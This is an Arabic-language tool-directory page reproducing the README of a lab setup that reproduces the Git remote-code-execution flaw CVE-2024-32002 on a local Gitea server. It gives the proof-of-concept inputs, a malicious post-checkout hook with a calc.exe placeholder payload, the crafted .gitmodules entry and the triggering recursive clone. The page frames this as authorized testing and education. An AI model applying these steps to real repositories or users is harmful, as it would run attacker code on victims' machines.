Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/chriswalker11/running-cve-2024-32002-locally-for-tesing
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubchriswalker11/running-cve-2024-32002-locally-for-tesing

running-CVE-2024-32002-locally-for-tesing

بيئة إعادة إنتاج محلية لاستغلال Git RCE CVE-2024-32002 باستخدام Gitea، مع حقن حمولة مخصصة عبر خطافات ما بعد السحب وتجاوز مسار الوحدة الفرعية.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نحن نكيف هذا للاستخدام المحلي

نتبع منشور المدونة هذا ولكن مع بعض الاختلافات الرئيسية https://amalmurali.me/posts/git-rce

كيف يعمل

  1. مستودع خبيث (git_rce) يتضمن وحدة فرعية بمسار مصمم خصيصًا.
  2. مسار الوحدة الفرعية يستخدم اختلافًا في حالة الأحرف يستغل نظام الملفات غير الحساس لحالة الأحرف.
  3. الوحدة الفرعية تتضمن رابطًا رمزيًا يشير إلى دليل .git/ الخاص بها، والذي يحتوي على خطاف خبيث.
  4. عند استنساخ المستودع، يتم تتبع الرابط الرمزي، ويتم تنفيذ الخطاف الخبيث، مما يؤدي إلى تنفيذ الأوامر عن بُعد (RCE).

الاستنساخ

⚠️ تحذير: لا تقم بتشغيل هذا الإثبات على أنظمة لا تملكها أو ليس لديك إذن صريح لاستخدامها. الاختبار غير المصرح به قد يؤدي إلى عواقب غير مقصودة.

نحتاج إلى إنشاء رمز API لـ Gitea يمكن العثور عليه في http://<YOUR_GITEA_SERVER_IP>:3000/user/settings/applications لقد أعطيت الرمز وصولًا لكل شيء للتأكد من أن كل شيء يعمل

ثم يمكننا تشغيل poc.sh الخاص بنا مع التأكد من توفير المعلومات المطلوبة مثل عنوان IP والمنفذ لخادم Gitea واسم المستخدم والرمز لإنشاء المستودعات

root@kitploit:~
Enter the IP address or FQDN (without http://): localhost:3000 Enter your username: chris Enter your API token: 3c57dbe1756734612f457b1fa08583df64fb5ea4 Enter the name for the first repository: hook Enter the name for the second repository: main

أيضًا نحتاج إلى تعديل الأسطر من 42 إلى 46 لتضمين الحمولة

root@kitploit:~
# Write the malicious code to a hook
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe #or replace with other poc 
EOF

هناك خطوة إضافية واحدة: يجب أن نذهب إلى ملف .gitmodules من المستودع main إلى المستودع hook. لقد ذهبت يدويًا إلى المستودع في Gitea وقمت بتغيير الملف

screenshot1

ثم قمت بذلك

root@kitploit:~
[submodule "x/y"]
	path = A/modules/x
	url = http://<your_git_tea_server>:3000/chris/hook.git

مع التأكد من أنه عندما أذهب إلى A/modules يمكنني رؤية شيء مثل هذا

screenshot2

ثم النقر على هذا الالتزام يجب أن يُظهر المستودع الآخر مع محتوى الإثبات عند النقر عليه

ثم يمكننا أخذ عنوان URL الخاص بنا ويجب أن يعمل هذا لتفعيل الاستغلال

root@kitploit:~
git clone --recursive http://<your_git_tea_server>:3000/<your_user_name>/main.git

الاعترافات

شكرًا لـ filip-hejsek وamalmurali47 لاكتشاف هذه الثغرة الأمنية ولديهما منشور مدونة ومستودع للتكيف منه.

تنزيل الأداة